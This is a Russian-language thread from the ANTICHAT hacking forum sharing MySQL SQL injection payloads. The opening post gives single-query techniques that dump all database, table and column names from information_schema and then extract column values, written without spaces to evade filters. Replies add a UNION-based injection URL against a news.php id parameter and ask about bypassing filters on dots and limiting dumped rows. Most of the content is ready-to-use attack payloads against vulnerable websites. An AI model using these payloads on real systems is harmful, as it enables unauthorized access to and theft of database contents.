ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Товарищ profexer сделал очень крутую вещь - ускоритель MySQL.

Вывод данных в один запрос:

SELECT MID(CONCAT(@p:=0x20,(SELECT COUNT(*) FROM {TABLE} WHERE @p:=CONCAT(@p,0x2C,{COLUMNS})),@p),5)

Хотелось бы сразу получить одним запросом абсолютно всю структуру и уже далее тащить данные, а сделать можно это так(я сделал пример без пробелов!). Если есть предположения, что бд очень много, то сразу можно использовать пример ниже.



Список абсолютно всех бд, таблиц, колонок одним запросом(без пробелов!)

SELECT(MID(CONCAT(@p:=0x20,(SELECT(COUNT(*))FROM(i nformation_schema.columns)WHERE@p:=CONCAT(@p,0x0D0 A ,table_schema,0x3a,table_name,0x3a,column_name)),@ p),5))

0x0D0A -> перевод строки, смотреть в "Исходный код страницы"

Если желаете, то можете заменить на 0x2C -> Запятая или другой удобной вид, но в данном случае, как мне кажется, структуру любой бд с скули наглядно сразу не будет видно.

Ну далее частные случаи:



Список бд(без пробелов!)

SELECT(MID(CONCAT(@p:=0x20,(SELECT(COUNT(*))FROM(i nformation_schema.schemata)WHERE@p:=CONCAT(@p,0x2C ,schema_name)),@p),5))

Список всех бд, таблиц(без пробелов!)

SELECT(MID(CONCAT(@p:=0x20,(SELECT(COUNT(*))FROM(i nformation_schema.tables)WHERE@p:=CONCAT(@p,0x0D0A ,table_schema,0x3a,table_name)),@p),5))

Список всех таблиц, колонок текущей бд(без пробелов!)

SELECT(MID(CONCAT(@p:=0x20,(SELECT(COUNT(*))FROM(( select*from(information_schema.columns)where(table _schema=database()))x)WHERE@p:=CONCAT(@p,0x0D0A ,table_schema,0x3a,table_name,0x3a,column_name)),@ p),5))

Список таблиц текущей бд(без пробелов!)

SELECT(MID(CONCAT(@p:=0x20,(SELECT(COUNT(*))FROM(( select*from(information_schema.tables)where(table_ schema=database()))x)WHERE@p:=CONCAT(@p,0x2C,table _name)),@p),5))

Список колонок таблицы users(без пробелов!)

SELECT(MID(CONCAT(@p:=0x20,(SELECT(COUNT(*))FROM(( select*from(information_schema.columns)where(table _name=0x7573657273))x)WHERE@p:=CONCAT(@p,0x2C,colu mn_name)),@p),5))

ps помните, таблица users и в другой бд может быть, тогда добавить условие в where

И напоследок значения с колонок(без пробелов!)

SELECT(MID(CONCAT(@p:=0x20,(SELECT(COUNT(*))FROM({ TABLE})WHERE@p:=CONCAT(@p,0x0D0A,{COLUMN1},0x3a,{C OLUMN2})),@p),5))

Может есть софт который проверяет параметры страницы на инъекцию?

а то бывает что данные не выводятся, или ещё что-то такое.

интересует вот что

INFORMATION_SCHEMA.TABLES открывается вот таким способом

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 --

если кроме INFORMATION_SCHEMA на сайте есть

bd1

db2

как их открыть?

/threads/43966/page-4#post-1227563

пардон не видел)

Приветствую! А подскажите как правильно преобразоватть этот запрос с оператором LIMIT, что бы мне выводилось, к примеру, из COLUMN1,COLUMN2 только первые 5к записей, а не все сразу.

Если вдруг кому будет интересно, немного о том почему вообще работает метод вывода данных в тексте ошибки Duplicate entry '[data]' for key 'group_key'вынес в отдельную статью:

Error-Based SQL injection в MySQL

И максимально сокращенный вектор этого метода выглядит теперь вот так:

Вопрос) Если в инъекции нельзя заюзать точку и тем самым не могу сделать например [...] SELECT * FROM INFORMATION_SCHEMA.TABLES [...] пробовал заюзать CHAR() но почему-то в названии таблицы не пашет

Согласен, но это наиболее полный сбор всего.

Кстати гораздо лучше чем выделенная тема:
https://forum.antichat.ru/threadnav19605-1-10.html

__________________
..